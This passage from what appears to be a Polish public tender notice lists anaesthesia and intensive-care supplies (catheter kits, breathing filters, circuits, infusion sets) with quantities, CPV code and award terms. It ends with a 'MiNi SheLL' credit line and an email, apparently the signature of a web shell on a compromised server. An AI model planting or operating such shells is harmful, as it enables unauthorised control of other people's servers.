18. Czujnik przeplywu gazu do aparatu do znieczulania Leon Heinen + Lowenstein - 10 szt.;<br>
19. Czujnik tlenowy do aparatu do znieczulania Aespire Datex - 10 szt.;<br>
20. Czujnik tlenowy do aparatu do znieczulania Leon - Heinen+ Loewenstein - 10 szt.;<br>
21. Mankiet infuzyjny 500-1000ml do szybkich przetoczeń - 10 szt.;<br>
22. Czujnik, sonda do pomiaru temperatury, skórna - 30 szt.;<br>
23. Linia monitorująca gazy oddechowe do aparatu Aespire firmy Datex Ohmeda - 300 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.17.11.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie Nr 2..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Zestaw do drenażu opłucnej z zastawką Pleura-Seal, 8FR/19CM - 10 szt.;<br>
2. Zestaw do ciągłego znieczulenia splotów nerwowych, 19Ga - 10 szt.;<br>
3. Zestaw do znieczuleń zewnątrzoponowych, 19Ga - 80 szt.;<br>
4. Cewnik do tonometrii - 5 szt.<br>
5. Cewnik do tunelizacji żyły centralnej 1-światłowy, od 14Ga/20cm do 16 Ga/20 cm - 400 szt.;<br>
6. Zestaw do pomiaru PICCO2 do tętnicy udowej z przetwornikiem - 25 szt.;<br>
7. Zestaw do kaniulacji żył centralnych. W skład zestawu wchodzi : igła punkcyjna 18Ga/6,35 cm, prowadnik 2-światłowy cewnik z powłoką antybakteryjną (chlorheksadyna, sulfadiazyna srebra) , strzykawka z otworem w tłoku 5 ml, rozszerzadła, skrzydełka mocujące, igła do kontroli ciśnienia - 200 szt.;<br>
8. Zestaw do kaniulacji żył centralnych. W skład zestawu wchodzi : igła punkcyjna 18Ga/6,35 cm, prowadnik 3-światłowy cewnik z powłoką antybakteryjną (chlorheksadyna, sulfadiazyna srebra) , strzykawka z otworem w tłoku 5 ml, rozszerzadła, skrzydełka mocujące, igła do kontroli ciśnienia - 300 szt.;<br>
9. Zestaw do kaniulacji żył centralnych, w skład zestawu wchodzi igła punkcyjna 18Ga/6,35 cm, prowadnik, 5-światłowy cewnik, strzykawka 5 ml, rozszerzadło, skrzydełka mocujące - 30 kpl.;<br>
10. Przetwornik do pomiaru ciśnienia krwi typu Transpac IV do monitorów Datek Ohmeda, 60inch. (Kompleksowa linia pomiarowa winna mieć najwyższą częstotliwość własną w celu wyeliminowania zakłóceń rezonansowych) - 300 szt.;<br>
11. Przedłużacz z obrotowym złączem kolanowym z portem do bronchoskopii o śr.9,5mm, 22F/15F - 300 szt.;<br>
12. Przedłużacz do rurki intubacyjnej z rury elastycznej z obrotowym złączem, z portem do odsysania wydzieliny, 22FM/15F - 300 szt.;<br>
13. Przedłużacz do rurki intubacyjnej rozciągany z portem kapno (luer-luck), 22M/15F - 2500 szt.;<br>
14. Wymiennik ciepła i wilgoci do rurek tracheostomijnych z możliwością odsysania i portem kapno, 22M/15F - 700 szt.;<br>
15. Filtr oddechowy mechaniczny p/bakteryjny antywirusowy z portem kapno, 22F/15M-22M/15F - 4000 szt.;<br>
16. Filtr oddechowy p/bakteryjny antywirusowy z wymiennikiem ciepła i wilgoci z portem kapno, 22F/15M-22M/15F - 1600 szt.;<br>
17. Rura anestetyczna silikonowa 60cm - 6 szt.;<br>
18. Rura anestetyczna silikonowa 80cm - 10 szt.;<br>
19. Rura anestetyczna silikonowa 150cm - 10 szt.;<br>
20. Maska anestetyczna rozm. 2,3,4 - 30 szt.;<br>
21. Maska krtaniowa - wszystkie rozmiary - 100 szt.;<br>
22. Maska krtaniowa żelowa - wszystkie rozmiary - 30 szt.;<br>
23. Worek oddechowy 0,5l - 4 szt.;<br>
24. Worek oddechowy  2l - 6 szt.;<br>
25. Worek oddechowy  3l - 6 szt.;<br>
26. Jednorazowy układ okrężny dla dorosłych o regulowanej długości i pamięci kształtu do aparatów do znieczuleń w skład którego wchodzą:<br>
- dwie rury rozciągalne  z pamięcią kształtu o zakresie kompresji 42cm-200cm z zakończeniem 22F od strony respiratora<br>
- zintegrowany z rurami łącznik Y oraz odłączalny łącznik L z portem luer lock wyposażonym w bezpieczny kapturek na lince, od strony pacjenta zakończenie 22M/15F<br>
- dodatkowa rozciągalna gałąź o długości 1,5 m po rozciągnięciu z zakończeniem 22F po obu stronach<br>
- krótki łącznik 22M/22M<br>
- bezlateksowy worek oddechowy o pojemności 2l - 3000 szt.;<br>
27. Podstawowy układ oddechowy do respiratora o długości 1,6 m i średnicy 22mm - 300 szt.;<br>
28. Obwód oddechowy jednorazowego użytku do respiratora dla dorosłych z powłoką antybakteryjną składający się z dwóch rur karbowanych, z 2 portami oraz kolankiem - 100 szt.;<br>
29. Maska tlenowa wszystkie rozmiary - 300 szt.;<br>
30. Dren tlenowy 4m - 300 szt.;<br>
31. Kanister wielorazowy 2l do systemu Receptal - 15 szt.;<br>
32. Kanister wielorazowy 1l do systemu Receptal - 10 szt.<br>
33. Worek 2l do systemu Receptal 2000 - 1300 szt.;<br>
34. Worek 1l do systemu Receptal 2000 - 700 szt.;<br>
35. Dren do systemu Receptal	 - 2000 szt.;<br>
36. Strzykawka do gazometrii - 2000 szt.;<br>
37. Cewnik tlenowy donosowy dla dorosłych z wypustkami zakrzywionymi/rozszerzonymi z drenem na głowę, długość 1,5 m - 1500 szt.;<br>
38. Łącznik Y wielorazowy - 50 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.17.11.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie Nr 3..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Zestawy przezroczyste do przetaczania płynów infuzyjnych kompatybilne z pompą infuzyjną Lc-5000/PLUM A+ - 1800 szt.;<br>
2. Zestawy do przetaczania krwi kompatybilne z pompą PLUM A+ - 400 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.17.11.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com